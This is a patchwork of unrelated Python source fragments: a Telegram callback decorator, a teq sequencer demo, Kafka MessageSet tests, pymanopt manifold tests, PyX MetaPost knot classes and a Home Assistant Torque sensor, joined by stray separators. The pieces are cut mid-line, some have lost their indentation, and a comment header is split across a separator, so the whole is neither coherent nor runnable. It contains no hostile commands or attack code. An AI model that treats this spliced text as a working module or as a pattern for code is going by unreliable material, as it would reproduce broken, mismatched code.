    current_module = inspect.currentframe().f_back.f_globals['__name__'].split('.')[-1]
    @functools.wraps(func)
    def inner(instance, bot, update):
        module, data = parse_callback_data(update.callback_query.data)
        if module == current_module:
            return func(instance, bot, update)
        return lambda: True  # marks the CallbackQuery update as handled when no handler matched
    return inner
def grouper(iterable, n):
    """Yield successive groups of at most ``n`` items from *iterable*.

    Unlike the ``grouper(iterable, n, fillvalue=None)`` recipe from the
    itertools documentation
    (https://docs.python.org/3/library/itertools.html#itertools-recipes)
    the final group is NOT padded with a fill value when fewer than ``n``
    items remain.

    Returns a generator.

    Example:
    >>> my_list = [1, 2, 3, 4, 5, 6, 7, 8, 9]
    >>> tuple(grouper(my_list, 3))
    ((1, 2, 3), (4, 5, 6), (7, 8, 9))
    >>> tuple(grouper(my_list, 6))
    ((1, 2, 3, 4, 5, 6), (7, 8, 9))
    """
    source = iter(iterable)
    # iter(callable, sentinel) stops as soon as a slice comes back empty.
    yield from iter(lambda: tuple(itertools.islice(source, n)), ())
# Demo/driver script for the teq sequencer: builds four tracks, fills a
# pattern, and plays it back through JACK until the user presses Enter.
#
# Let's import the teq module. Make sure the dynamic linker is setup to find libteq.so. Also
# make sure that python finds teq.so (the python module).
#
import teq
# Let's import the little python library that makes some things a little easier
from pyteq import *
# Create a teq object. This creates the jack client, too..
t = teq.teq()
# Set the loop range. This is a function from pyteq that wraps creating the loop_range
# object and passing it to the teq instance.
set_loop_range(t, 0, 0, 1, 0, True)
# Create some tracks. Tracks have a name that MUST be unique. Otherwise track creation will
# fail with an exception.
print ("Adding a midi track...")
t.insert_midi_track("bd", 0)
print ("Adding a midi track...")
t.insert_midi_track("bar", 1)
print ("Adding a CV track...")
t.insert_cv_track("cv", 2)
print ("Adding a control track...")
t.insert_control_track("control", 3)
# Let's create a pattern. We can only create patterns using the factory function of
# the teq instance. It knows how many sequences the pattern has to have and their types.
#
# Note: you MUST NOT alter the tracks of the teq instance before calling insert_pattern() or
# set_pattern() with the created pattern. Otherwise these operations will fail
# throwing an exception.
p = t.create_pattern(16)
print ("Inserting a CV event...")
p.set_cv_event(2, 0, teq.cv_event(teq.cv_event_type.INTERVAL, 1, 1))
print ("Inserting a control event...")
# NOTE(review): the control-event call below is disabled even though the
# message above is still printed -- confirm against the current teq API
# before re-enabling.
#p.set_control_event(3, 0, teq.control_event(teq.control_event_type.GLOBAL_TEMPO, 32))
# Fill tracks 0 and 1: one note-on and one CC event per tick.
for n in range(0, 16):
    print ("Adding a midi note at tick ", n, " with note ", n, "...")
    p.set_midi_event(0, n, teq.midi_event(teq.midi_event_type.ON, n, 64))
    p.set_midi_event(1, n, teq.midi_event(teq.midi_event_type.CC, n, 64))
# Attach the filled pattern at position 0 and wait for the engine.
t.insert_pattern(0, p)
t.wait()
# Client processes MUST call gc() sometimes after altering state to clear up unused objects.
print ("Cleaning up some memory...")
t.gc()
t.set_global_tempo(4)
print ("Setting the transport position and starting playback...")
set_transport_position(t, 0, 0)
play(t)
# Wait for the user to press Enter...
try:
    i = input("Press Enter to continue...")
except:
    pass
# Shut down the jack client before exiting.
t.deactivate()
|
# Value
struct.pack('>q', 0), # MsgSet Offset
struct.pack('>i', 18), # Msg Size
struct.pack('>i', -16383415), # CRC
struct.pack('>bb', 0, 0), # Magic, flags
struct.pack('>i', 2), # Length of key
b'k2', # Key
struct.pack('>i', 2), # Length of value
b'v2', # Value
])
expect = struct.pack('>i', len(expect)) + expect
assert encoded == expect
def test_decode_message_set():
    """Decode a MessageSet holding two complete v0 messages.

    Wire format per entry: 8-byte offset, 4-byte message size, then the
    message itself (CRC, magic byte, attribute flags, length-prefixed key
    and length-prefixed value).
    """
    encoded = b''.join([
        struct.pack('>q', 0),          # MsgSet Offset
        struct.pack('>i', 18),         # Msg Size
        struct.pack('>i', 1474775406), # CRC
        struct.pack('>bb', 0, 0),      # Magic, flags
        struct.pack('>i', 2),          # Length of key
        b'k1',                         # Key
        struct.pack('>i', 2),          # Length of value
        b'v1',                         # Value
        struct.pack('>q', 1),          # MsgSet Offset
        struct.pack('>i', 18),         # Msg Size
        struct.pack('>i', -16383415),  # CRC
        struct.pack('>bb', 0, 0),      # Magic, flags
        struct.pack('>i', 2),          # Length of key
        b'k2',                         # Key
        struct.pack('>i', 2),          # Length of value
        b'v2',                         # Value
    ])
    msgs = MessageSet.decode(encoded, bytes_to_read=len(encoded))
    assert len(msgs) == 2
    msg1, msg2 = msgs
    # Each decoded entry is an (offset, size, message) triple.
    returned_offset1, message1_size, decoded_message1 = msg1
    returned_offset2, message2_size, decoded_message2 = msg2
    assert returned_offset1 == 0
    message1 = Message(b'v1', key=b'k1')
    # NOTE(review): encode() is called only for its side effect --
    # presumably it initializes lazily computed fields before the
    # equality comparison; confirm against Message's implementation.
    message1.encode()
    assert decoded_message1 == message1
    assert returned_offset2 == 1
    message2 = Message(b'v2', key=b'k2')
    message2.encode()
    assert decoded_message2 == message2
def test_encode_message_header():
    """A request header encodes api key/version, correlation id and client id."""
    expected_bytes = b''.join([
        struct.pack('>h', 10),               # API Key
        struct.pack('>h', 0),                # API Version
        struct.pack('>i', 4),                # Correlation Id
        struct.pack('>h', len('client3')),   # Length of clientId
        b'client3',                          # ClientId
    ])
    request = GroupCoordinatorRequest[0]('foo')
    header = RequestHeader(request, correlation_id=4, client_id='client3')
    assert header.encode() == expected_bytes
def test_decode_message_set_partial():
    """A truncated trailing message decodes to (None, None, PartialMessage()).

    The second entry advertises a size larger than the bytes remaining in
    the set, so only the first message decodes fully.
    """
    encoded = b''.join([
        struct.pack('>q', 0),          # Msg Offset
        struct.pack('>i', 18),         # Msg Size
        struct.pack('>i', 1474775406), # CRC
        struct.pack('>bb', 0, 0),      # Magic, flags
        struct.pack('>i', 2),          # Length of key
        b'k1',                         # Key
        struct.pack('>i', 2),          # Length of value
        b'v1',                         # Value
        struct.pack('>q', 1),          # Msg Offset
        struct.pack('>i', 24),         # Msg Size (larger than remaining MsgSet size)
        struct.pack('>i', -16383415),  # CRC
        struct.pack('>bb', 0, 0),      # Magic, flags
        struct.pack('>i', 2),          # Length of key
        b'k2',                         # Key
        struct.pack('>i', 8),          # Length of value
        b'ar',                         # Value (truncated)
    ])
    msgs = MessageSet.decode(encoded, bytes_to_read=len(encoded))
    assert len(msgs) == 2
    msg1, msg2 = msgs
    returned_offset1, message1_size, decoded_message1 = msg1
    returned_offset2, message2_size, decoded_message2 = msg2
    # The complete first message round-trips.
    assert returned_offset1 == 0
    message1 = Message(b'v1', key=b'k1')
    # NOTE(review): encode() is called only for its side effect --
    # presumably it initializes lazily computed fields before the
    # equality comparison; confirm against Message's implementation.
    message1.encode()
    assert decoded_message1 == message1
    # The truncated second message yields a placeholder triple.
    assert returned_offset2 is None
    assert message2_size is None
    assert decoded_message2 == PartialMessage()
def test_decode_fetch_response_partial():
    """Decode a FetchResponse with one topic and two partitions, where each
    partition's message set ends in a truncated message.

    The truncated trailing entries must surface as PartialMessage
    placeholders rather than break decoding.
    """
    encoded = b''.join([
        Int32.encode(1),               # Num Topics (Array)
        String('utf-8').encode('foobar'),
        Int32.encode(2),               # Num Partitions (Array)
        Int32.encode(0),               # Partition id
        Int16.encode(0),               # Error Code
        Int64.encode(1234),            # Highwater offset
        Int32.encode(52),              # MessageSet size
        Int64.encode(0),               # Msg Offset
        Int32.encode(18),              # Msg Size
        struct.pack('>i', 1474775406), # CRC
        struct.pack('>bb', 0, 0),      # Magic, flags
        struct.pack('>i', 2),          # Length of key
        b'k1',                         # Key
        struct.pack('>i', 2),          # Length of value
        b'v1',                         # Value
        Int64.encode(1),               # Msg Offset
        struct.pack('>i', 24),         # Msg Size (larger than remaining MsgSet size)
        struct.pack('>i', -16383415),  # CRC
        struct.pack('>bb', 0, 0),      # Magic, flags
        struct.pack('>i', 2),          # Length of key
        b'k2',                         # Key
        struct.pack('>i', 8),          # Length of value
        b'ar',                         # Value (truncated)
        Int32.encode(1),               # Partition id
        Int16.encode(0),               # Error Code
        Int64.encode(2345),            # Highwater offset
        Int32.encode(52),              # MessageSet size
        Int64.encode(0),               # Msg Offset
        Int32.encode(18),              # Msg Size
        struct.pack('>i', 1474775406), # CRC
        struct.pack('>bb', 0, 0),      # Magic, flags
        struct.pack('>i', 2),          # Length of key
        b'k1',                         # Key
        struct.pack('>i', 2),          # Length of value
        b'v1',                         # Value
        Int64.encode(1),               # Msg Offset
        struct.pack('>i', 24),         # Msg Size (larger than remaining MsgSet size)
        struct.pack('>i', -16383415),  # CRC
        struct.pack('>bb', 0, 0),      # Magic, flags
        struct.pack('>i', 2),          # Length of key
        b'k2',                         # Key
        struct.pack('>i', 8),          # Length of value
        b'ar',                         # Value (truncated)
    ])
    resp = FetchResponse[0].decode(io.BytesIO(encoded))
    assert len(resp.topics) == 1
    topic, partitions = resp.topics[0]
    assert topic == 'foobar'
    assert len(partitions) == 2
    # partitions[i][3] holds the raw message-set bytes for partition i.
    m1 = MessageSet.decode(
        partitions[0][3], bytes_to_read=len(partitions[0][3]))
    assert len(m1) == 2
    # The truncated second entry decodes to the placeholder triple.
    assert m1[1] == (None, None, PartialMessage())
def test_struct_unrecognized_kwargs():
    """A Struct constructor must reject keyword arguments it does not define."""
    caught = False
    try:
        MetadataRequest[0](topicz='foo')
    except ValueError:
        caught = True
    assert caught, 'Structs should not allow unrecognized kwargs'
def test_struct_missing_kwargs():
    """Constructor fields that are omitted must default to None."""
    request = FetchRequest[0](max_wait_time=100)
    assert request.min_bytes is None
def test_unsigned_varint_serde():
    """Round-trip known value/byte-sequence pairs through UnsignedVarInt32."""
    cases = {
        0: [0],
        -1: [0xff, 0xff, 0xff, 0xff, 0x0f],
        1: [1],
        63: [0x3f],
        -64: [0xc0, 0xff, 0xff, 0xff, 0x0f],
        64: [0x40],
        8191: [0xff, 0x3f],
        -8192: [0x80, 0xc0, 0xff, 0xff, 0x0f],
        8192: [0x80, 0x40],
        -8193: [0xff, 0xbf, 0xff, 0xff, 0x0f],
        1048575: [0xff, 0xff, 0x3f],
    }
    for raw_value, byte_values in cases.items():
        # Negative inputs are reinterpreted as their unsigned 32-bit value.
        masked = raw_value & 0xffffffff
        wire = UnsignedVarInt32.encode(masked)
        assert wire == bytes(byte_values)
        assert UnsignedVarInt32.decode(io.BytesIO(wire)) == masked
def test_compact_data_structs():
cs = CompactString()
encoded = cs.encode(None)
assert encoded == struct.pack('B', 0)
decoded = cs.decode(io.BytesIO(encoded))
assert decoded is None
assert b'\x01' == cs.encode('')
assert '' == cs.decode(io.BytesIO(b'\x01'))
encoded = cs.encode("foobarbaz")
assert cs.decode(io.BytesIO(encoded)) == "foobarbaz"
arr = CompactArray(CompactString())
assert arr.encode(None) == b'\x00'
assert arr.decode(io.BytesIO(b'\x00')) is None
enc = arr.encode([])
assert enc == b'\x01'
assert [] == arr.decode(io.BytesIO(enc))
encoded = arr.encode(["foo", "bar", "baz", "q |
import numpy as np
from numpy import linalg as la
from numpy import testing as np_testing
from pymanopt.manifolds import FixedRankEmbedded
from .._test import TestCase
class TestFixedRankEmbeddedManifold(TestCase):
    """Tests for the FixedRankEmbedded manifold of m x n matrices of rank k.

    As exercised below, a point x is an SVD-like triple (u, s, vt) with
    u of shape (m, k), s of shape (k,) and vt of shape (k, n), where u has
    orthonormal columns and vt orthonormal rows (test_rand).  A tangent
    vector is a triple with shapes (m, k), (k, k) and (n, k) whose outer
    factors are orthogonal to the point's factors (test_randvec).  The
    ambient embedding of a tangent vector a at x is
    x[0] @ a[1] @ x[2] + a[0] @ x[2] + x[0] @ a[2].T (test_inner).
    """
    def setUp(self):
        # Fixed problem dimensions shared by every test below.
        self.m = m = 10
        self.n = n = 5
        self.k = k = 3
        self.man = FixedRankEmbedded(m, n, k)
    def test_dim(self):
        # dim = k * (m + n - k) for rank-k embedded matrices.
        assert self.man.dim == (self.m + self.n - self.k) * self.k
    def test_typicaldist(self):
        assert self.man.dim == self.man.typicaldist
    def test_dist(self):
        # The geodesic distance is not implemented for this manifold.
        e = self.man
        a = e.rand()
        x = e.randvec(a)
        y = e.randvec(a)
        with self.assertRaises(NotImplementedError):
            e.dist(x, y)
    def test_inner(self):
        e = self.man
        x = e.rand()
        a = e.randvec(x)
        b = e.randvec(x)
        # First embed in the ambient space
        A = x[0] @ a[1] @ x[2] + a[0] @ x[2] + x[0] @ a[2].T
        B = x[0] @ b[1] @ x[2] + b[0] @ x[2] + x[0] @ b[2].T
        # The manifold inner product must match the ambient Frobenius one.
        trueinner = np.sum(A * B)
        np_testing.assert_almost_equal(trueinner, e.inner(x, a, b))
    def test_proj_range(self):
        m = self.man
        x = m.rand()
        v = np.random.randn(self.m, self.n)
        g = m.proj(x, v)
        # Check that g is a true tangent vector
        np_testing.assert_allclose(
            g[0].T @ x[0], np.zeros((self.k, self.k)), atol=1e-6
        )
        np_testing.assert_allclose(
            g[2].T @ x[2].T, np.zeros((self.k, self.k)), atol=1e-6
        )
    def test_proj(self):
        # Verify that proj gives the closest point within the tangent space
        # by displacing the result slightly and checking that this increases
        # the distance.
        m = self.man
        x = self.man.rand()
        v = np.random.randn(self.m, self.n)
        g = m.proj(x, v)
        # Displace g a little
        g_disp = g + 0.01 * m.randvec(x)
        # Return to the ambient representation
        g = m.tangent2ambient(x, g)
        g_disp = m.tangent2ambient(x, g_disp)
        g = g[0] @ g[1] @ g[2].T
        g_disp = g_disp[0] @ g_disp[1] @ g_disp[2].T
        assert np.linalg.norm(g - v) < np.linalg.norm(g_disp - v)
    def test_proj_tangents(self):
        # Verify that proj leaves tangent vectors unchanged
        e = self.man
        x = e.rand()
        u = e.randvec(x)
        A = e.proj(x, e.tangent2ambient(x, u))
        B = u
        # diff = [A[k]-B[k] for k in range(len(A))]
        np_testing.assert_allclose(A[0], B[0])
        np_testing.assert_allclose(A[1], B[1])
        np_testing.assert_allclose(A[2], B[2])
    def test_norm(self):
        # The norm must be induced by the inner product.
        e = self.man
        x = e.rand()
        u = e.randvec(x)
        np_testing.assert_almost_equal(np.sqrt(e.inner(x, u, u)), e.norm(x, u))
    def test_rand(self):
        e = self.man
        x = e.rand()
        y = e.rand()
        # Points are (u, s, vt) triples with orthonormal outer factors.
        assert np.shape(x[0]) == (self.m, self.k)
        assert np.shape(x[1]) == (self.k,)
        assert np.shape(x[2]) == (self.k, self.n)
        np_testing.assert_allclose(x[0].T @ x[0], np.eye(self.k), atol=1e-6)
        np_testing.assert_allclose(x[2] @ x[2].T, np.eye(self.k), atol=1e-6)
        # Two independent draws should differ.
        assert la.norm(x[0] - y[0]) > 1e-6
        assert la.norm(x[1] - y[1]) > 1e-6
        assert la.norm(x[2] - y[2]) > 1e-6
    def test_transp(self):
        # Transport must agree with projecting the ambient representation.
        s = self.man
        x = s.rand()
        y = s.rand()
        u = s.randvec(x)
        A = s.transp(x, y, u)
        B = s.proj(y, s.tangent2ambient(x, u))
        diff = [A[k] - B[k] for k in range(len(A))]
        np_testing.assert_almost_equal(s.norm(y, diff), 0)
    def test_apply_ambient(self):
        m = self.man
        z = np.random.randn(self.m, self.n)
        # Set u, s, v so that z = u @ s @ v.T
        u, s, v = np.linalg.svd(z, full_matrices=False)
        s = np.diag(s)
        v = v.T
        w = np.random.randn(self.n, self.n)
        # _apply_ambient must accept both dense and factored arguments.
        np_testing.assert_allclose(z @ w, m._apply_ambient(z, w))
        np_testing.assert_allclose(z @ w, m._apply_ambient((u, s, v), w))
    def test_apply_ambient_transpose(self):
        m = self.man
        z = np.random.randn(self.n, self.m)
        # Set u, s, v so that z = u @ s @ v.T
        u, s, v = np.linalg.svd(z, full_matrices=False)
        s = np.diag(s)
        v = v.T
        w = np.random.randn(self.n, self.n)
        np_testing.assert_allclose(z.T @ w, m._apply_ambient_transpose(z, w))
        np_testing.assert_allclose(
            z.T @ w, m._apply_ambient_transpose((u, s, v), w)
        )
    def test_tangent2ambient(self):
        m = self.man
        x = m.rand()
        z = m.randvec(x)
        # Explicit ambient embedding of the tangent triple.
        z_ambient = x[0] @ z[1] @ x[2] + z[0] @ x[2] + x[0] @ z[2].T
        u, s, v = m.tangent2ambient(x, z)
        np_testing.assert_allclose(z_ambient, u @ s @ v.T)
    def test_ehess2rhess(self):
        pass
    def test_retr(self):
        # Test that the result is on the manifold and that for small
        # tangent vectors it has little effect.
        x = self.man.rand()
        u = self.man.randvec(x)
        y = self.man.retr(x, u)
        np_testing.assert_allclose(y[0].T @ y[0], np.eye(self.k), atol=1e-6)
        np_testing.assert_allclose(y[2] @ y[2].T, np.eye(self.k), atol=1e-6)
        # A first-order retraction: retr(x, eps*u) ~ x + eps*u.
        u = u * 1e-6
        y = self.man.retr(x, u)
        y = y[0] @ np.diag(y[1]) @ y[2]
        u = self.man.tangent2ambient(x, u)
        u = u[0] @ u[1] @ u[2].T
        x = x[0] @ np.diag(x[1]) @ x[2]
        np_testing.assert_allclose(y, x + u, atol=1e-5)
    def test_egrad2rgrad(self):
        # Verify that egrad2rgrad and proj are equivalent.
        m = self.man
        x = m.rand()
        u, s, vt = x
        i = np.eye(self.k)
        # f is the coupling factor between pairs of singular values.
        f = 1 / (s[..., np.newaxis, :] ** 2 - s[..., :, np.newaxis] ** 2 + i)
        du = np.random.randn(self.m, self.k)
        ds = np.random.randn(self.k)
        dvt = np.random.randn(self.k, self.n)
        Up = (np.eye(self.m) - u @ u.T) @ du @ np.linalg.inv(np.diag(s))
        M = (
            f * (u.T @ du - du.T @ u) @ np.diag(s)
            + np.diag(s) @ f * (vt @ dvt.T - dvt @ vt.T)
            + np.diag(ds)
        )
        Vp = (np.eye(self.n) - vt.T @ vt) @ dvt.T @ np.linalg.inv(np.diag(s))
        # NOTE: this rebinds m from the manifold to the middle factor of
        # the gradient; the manifold is not needed afterwards.
        up, m, vp = m.egrad2rgrad(x, (du, ds, dvt))
        np_testing.assert_allclose(Up, up)
        np_testing.assert_allclose(M, m)
        np_testing.assert_allclose(Vp, vp)
    def test_randvec(self):
        e = self.man
        x = e.rand()
        u = e.randvec(x)
        # Check that u is a tangent vector
        assert np.shape(u[0]) == (self.m, self.k)
        assert np.shape(u[1]) == (self.k, self.k)
        assert np.shape(u[2]) == (self.n, self.k)
        np_testing.assert_allclose(
            u[0].T @ x[0], np.zeros((self.k, self.k)), atol=1e-6
        )
        np_testing.assert_allclose(
            u[2].T @ x[2].T, np.zeros((self.k, self.k)), atol=1e-6
        )
        # Random tangent vectors are unit-norm and non-degenerate.
        v = e.randvec(x)
        np_testing.assert_almost_equal(e.norm(x, u), 1)
        assert e.norm(x, u - v) > 1e-6
|
# -*- c | oding: utf-8 -*-
""" Thermodynamic analysis for Flux-Based Analysis
.. moduleauthor:: pyTFA team
"""
from .thermo.tmodel im | port ThermoModel
|
, in pt)
_epsilon = 1e-5
def set(epsilon=None):
    """Set module-level numerical parameters.

    epsilon: new value for the module-wide ``_epsilon`` constant
        (presumably a numeric tolerance used by the path computations;
        its use is outside this view -- confirm).  ``None`` leaves the
        current value unchanged.

    NOTE: this deliberately shadows the builtin ``set`` inside this module.
    """
    global _epsilon
    if epsilon is not None:
        _epsilon = epsilon
################################################################################
# Path knots
################################################################################
class _knot:
"""Internal knot as used in MetaPost (mp.c)"""
def __init__(self, x_pt, y_pt, ltype, lx_pt, ly_pt, rtype, rx_pt, ry_pt):
self.x_pt = x_pt
self.y_pt = y_pt
self.ltype = ltype
self.lx_pt = lx_pt
self.ly_pt = ly_pt
self.rtype = rtype
self.rx_pt = rx_pt
self.ry_pt = ry_pt
# this is a linked list:
self.next = self
def set_left_tension(self, tens):
self.ly_pt = tens
def set_right_tension(self, tens):
self.ry_pt = tens
def set_left_curl(self, curl):
self.lx_pt = curl
def set_right_curl(self, curl):
self.rx_pt = curl
set_left_given = set_left_curl
set_right_given = set_right_curl
def left_tension(self):
return self.ly_pt
def right_tension(self):
return self.ry_pt
def left_curl(self):
return self.lx_pt
def right_curl(self):
return self.rx_pt
left_given = left_curl
right_given = right_curl
def linked_len(self):
"""returns the length of a circularly linked list of knots"""
n = 1
p = self.next
while not p is self:
n += 1
p = p.next
return n
def __repr__(self):
result = ""
# left
if self.ltype == mp_endpoint:
pass
elif self.ltype == mp_explicit:
result += "{explicit %s %s}" % (self.lx_pt, self.ly_pt)
elif self.ltype == mp_given:
result += "{given %g tens %g}" % (self.lx_pt, self.ly_pt)
elif self.ltype == mp_curl:
result += "{curl %g tens %g}" % (self.lx_pt, self.ly_pt)
elif self.ltype == mp_open:
result += "{open tens %g}" % (self.ly_pt)
elif self.ltype == mp_end_cycle:
result += "{cycle tens %g}" % (self.ly_pt)
result += "(%g %g)" % (self.x_pt, self.y_pt)
# right
if self.rtype == mp_endpoint:
pass
elif self.rtype == mp_explicit:
result += "{explicit %g %g}" % (self.rx_pt, self.ry_pt)
elif self.rtype == mp_given:
result += "{given %g tens %g}" % (self.rx_pt, self.ry_pt)
elif self.rtype == mp_curl:
result += "{curl %g tens %g}" % (self.rx_pt, self.ry_pt)
elif self.rtype == mp_open:
result += "{open tens %g}" % (self.ry_pt)
elif self.rtype == mp_end_cycle:
result += "{cycle tens %g}" % (self.ry_pt)
return result
class beginknot_pt(_knot):
    """A knot which interrupts a path, or which allows to continue it with a straight line"""
    def __init__(self, x_pt, y_pt, curl=1, angle=None):
        """Start knot in points; an explicit *angle* overrides *curl*."""
        # Renamed locals (was type/value) to avoid shadowing the builtin
        # ``type``.
        if angle is None:
            rtype, rvalue = mp_curl, curl
        else:
            rtype, rvalue = mp_given, angle
        # tensions are modified by the adjacent curve, but default is 1
        _knot.__init__(self, x_pt, y_pt, mp_endpoint, None, None, rtype, rvalue, 1)
class beginknot(beginknot_pt):
    """User-coordinate version of beginknot_pt; *angle* is given in degrees."""
    def __init__(self, x, y, curl=1, angle=None):
        if angle is not None:
            angle = radians(angle)
        beginknot_pt.__init__(self, unit.topt(x), unit.topt(y), curl, angle)
startknot = beginknot
class endknot_pt(_knot):
    """A knot which interrupts a path, or which allows to continue it with a straight line"""
    def __init__(self, x_pt, y_pt, curl=1, angle=None):
        """End knot in points; an explicit *angle* overrides *curl*."""
        # Renamed locals (was type/value) to avoid shadowing the builtin
        # ``type``.
        if angle is None:
            ltype, lvalue = mp_curl, curl
        else:
            ltype, lvalue = mp_given, angle
        # tensions are modified by the adjacent curve, but default is 1
        _knot.__init__(self, x_pt, y_pt, ltype, lvalue, 1, mp_endpoint, None, None)
class endknot(endknot_pt):
    """User-coordinate version of endknot_pt; *angle* is given in degrees."""
    def __init__(self, x, y, curl=1, angle=None):
        if angle is not None:
            angle = radians(angle)
        endknot_pt.__init__(self, unit.topt(x), unit.topt(y), curl, angle)
class smoothknot_pt(_knot):
    """A knot with continuous tangent and "mock" curvature."""
    def __init__(self, x_pt, y_pt):
        # Both sides are "open": the solver chooses the direction.
        # Tensions default to 1 and may be modified by the adjacent curve.
        _knot.__init__(self, x_pt, y_pt, mp_open, None, 1, mp_open, None, 1)
class smoothknot(smoothknot_pt):
    """User-coordinate version of smoothknot_pt."""
    def __init__(self, x, y):
        smoothknot_pt.__init__(self, unit.topt(x), unit.topt(y))
knot = smoothknot
class roughknot_pt(_knot):
    """A knot with a non-continuous tangent."""
    def __init__(self, x_pt, y_pt, lcurl=1, rcurl=None, langle=None, rangle=None):
        """Specify either the relative curvatures, or tangent angles left (l)
        or right (r) of the point."""
        # Left side: an explicit angle overrides the curl.
        if langle is not None:
            ltype, lvalue = mp_given, langle
        else:
            ltype, lvalue = mp_curl, lcurl
        # Right side: explicit curl, then explicit angle, else copy the left.
        if rcurl is not None:
            rtype, rvalue = mp_curl, rcurl
        elif rangle is not None:
            rtype, rvalue = mp_given, rangle
        else:
            rtype, rvalue = ltype, lvalue
        # tensions are modified by the adjacent curve, but default is 1
        _knot.__init__(self, x_pt, y_pt, ltype, lvalue, 1, rtype, rvalue, 1)
class roughknot(roughknot_pt):
    """User-coordinate version of roughknot_pt; angles are in degrees."""
    def __init__(self, x, y, lcurl=1, rcurl=None, langle=None, rangle=None):
        x_pt, y_pt = unit.topt(x), unit.topt(y)
        if langle is not None:
            langle = radians(langle)
        if rangle is not None:
            rangle = radians(rangle)
        roughknot_pt.__init__(self, x_pt, y_pt, lcurl, rcurl, langle, rangle)
################################################################################
# Path links
################################################################################
class _link:
    """Abstract base class for the connecting element between two knots."""
    def set_knots(self, left_knot, right_knot):
        """Sets the internal properties of the metapost knots"""
        # Subclasses override this; the base implementation is a no-op.
        pass
class line(_link):
    """A straight line"""
    def __init__(self, keepangles=False):
        """The option keepangles will guarantee a continuous tangent. The
        curvature may become discontinuous, however"""
        self.keepangles = keepangles
    def set_knots(self, left_knot, right_knot):
        # A straight segment turns both adjoining knot sides into endpoints.
        left_knot.rtype = mp_endpoint
        right_knot.ltype = mp_endpoint
        left_knot.rx_pt = left_knot.ry_pt = None
        right_knot.lx_pt = right_knot.ly_pt = None
        if self.keepangles:
            # Pin the tangent on both sides to the segment's direction.
            dx = right_knot.x_pt - left_knot.x_pt
            dy = right_knot.y_pt - left_knot.y_pt
            direction = atan2(dy, dx)
            left_knot.ltype = mp_given
            left_knot.set_left_given(direction)
            right_knot.rtype = mp_given
            right_knot.set_right_given(direction)
class controlcurve_pt(_link):
    """A cubic Bezier curve which has its control points explicitly set"""
    def __init__(self, lcontrol_pt, rcontrol_pt):
        """The control points at the beginning (l) and the end (r) must be
        coordinate pairs"""
        self.lcontrol_pt = lcontrol_pt
        self.rcontrol_pt = rcontrol_pt
    def set_knots(self, left_knot, right_knot):
        # Explicit control points fully determine both adjoining knot sides.
        left_knot.rtype = mp_explicit
        left_knot.rx_pt, left_knot.ry_pt = self.lcontrol_pt
        right_knot.ltype = mp_explicit
        right_knot.lx_pt, right_knot.ly_pt = self.rcontrol_pt
class controlcurve(controlcurve_pt):
    """User-coordinate version of controlcurve_pt."""
    def __init__(self, lcontrol, rcontrol):
        lcontrol_pt = (unit.topt(lcontrol[0]), unit.topt(lcontrol[1]))
        rcontrol_pt = (unit.topt(rcontrol[0]), unit.topt(rcontrol[1]))
        controlcurve_pt.__init__(self, lcontrol_pt, rcontrol_pt)
class tensioncurve(_link):
"""A yet unspecified cubic Bezier curve"""
def __init__(self, ltension=1, latleast=False, rtension=None, ratleast=None):
"""The tension parameters indicate the tensions at the beginning (l)
and the end (r) of the curve. Set the parameters (l/r)atleast to True
if you want to avoid inflection points."""
if rtension is None:
rtension = ltension
if ratleast is None:
ratleast = latleast
# make sure that tension >= 0.75 |
"""Support for the Torque OBD application."""
import logging
import re
import voluptuous as vol
from homeassistant.core import callback
from homeassistant.components.http import HomeAssistantView
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import CONF_EMAIL, CONF_NAME
from homeassistant.helpers.entity import Entity
import homeassistant.helpers.config_validation as cv
_LOGGER = logging.getLogger(__name__)
API_PATH = "/api/torque"
DEFAULT_NAME = "vehicle"
DOMAIN = "torque"
ENTITY_NAME_FORMAT = "{0} {1}"
SENSOR_EMAIL_FIELD = "eml"
SENSOR_NAME_KEY = r"userFullName(\w+)"
SENSOR_UNIT_KEY = r"userUnit(\w+)"
SENSOR_VALUE_KEY = r"k(\w+)"
NAME_KEY = re.compile(SENSOR_NAME_KEY)
UNIT_KEY = re.compile(SENSOR_UNIT_KEY)
VALUE_KEY = re.compile(SENSOR_VALUE_KEY)
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Required(CONF_EMAIL): cv.string,
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
}
)
def convert_pid(value):
    """Convert a Torque pid from its hexadecimal string form to an integer."""
    return int(value, base=16)
def setup_platform(hass, config, add_entities, discovery_info=None):
    """Set up the Torque platform."""
    # The view owns the (initially empty) pid -> sensor registry and
    # creates entities lazily as data arrives.
    view = TorqueReceiveDataView(
        config.get(CONF_EMAIL), config.get(CONF_NAME), {}, add_entities
    )
    hass.http.register_view(view)
    return True
class TorqueReceiveDataView(HomeAssistantView):
    """Handle data from Torque requests."""
    url = API_PATH
    name = "api:torque"
    def __init__(self, email, vehicle, sensors, add_entities):
        """Initialize a Torque view.

        email: if not None, requests whose 'eml' query field differs are
            ignored.
        vehicle: display-name prefix for created sensor entities.
        sensors: dict mapping pid -> TorqueSensor, shared with the platform.
        add_entities: Home Assistant callback used to register new sensors.
        """
        self.email = email
        self.vehicle = vehicle
        self.sensors = sensors
        self.add_entities = add_entities
    @callback
    def get(self, request):
        """Handle Torque data request."""
        hass = request.app["hass"]
        data = request.query
        # Ignore requests whose email field does not match the configured one.
        if self.email is not None and self.email != data[SENSOR_EMAIL_FIELD]:
            return
        names = {}
        units = {}
        # Query keys encode their meaning: userFullName<pid>, userUnit<pid>
        # and k<pid> carry a sensor's name, unit and current value.
        for key in data:
            is_name = NAME_KEY.match(key)
            is_unit = UNIT_KEY.match(key)
            is_value = VALUE_KEY.match(key)
            if is_name:
                pid = convert_pid(is_name.group(1))
                names[pid] = data[key]
            elif is_unit:
                pid = convert_pid(is_unit.group(1))
                units[pid] = data[key]
            elif is_value:
                pid = convert_pid(is_value.group(1))
                # Values only update sensors that already exist; creation
                # happens below once a name is known.
                if pid in self.sensors:
                    self.sensors[pid].async_on_update(data[key])
        for pid in names:
            if pid not in self.sensors:
                self.sensors[pid] = TorqueSensor(
                    ENTITY_NAME_FORMAT.format(self.vehicle, names[pid]),
                    units.get(pid, None),
                )
                hass.async_add_job(self.add_entities, [self.sensors[pid]])
        return "OK!"
class TorqueSensor(Entity):
    """Representation of a Torque sensor."""
    def __init__(self, name, unit):
        """Initialize the sensor with its display name and unit."""
        self._name = name
        self._unit = unit
        self._state = None
    @property
    def name(self):
        """Return the display name of the sensor."""
        return self._name
    @property
    def state(self):
        """Return the most recently received reading."""
        return self._state
    @property
    def unit_of_measurement(self):
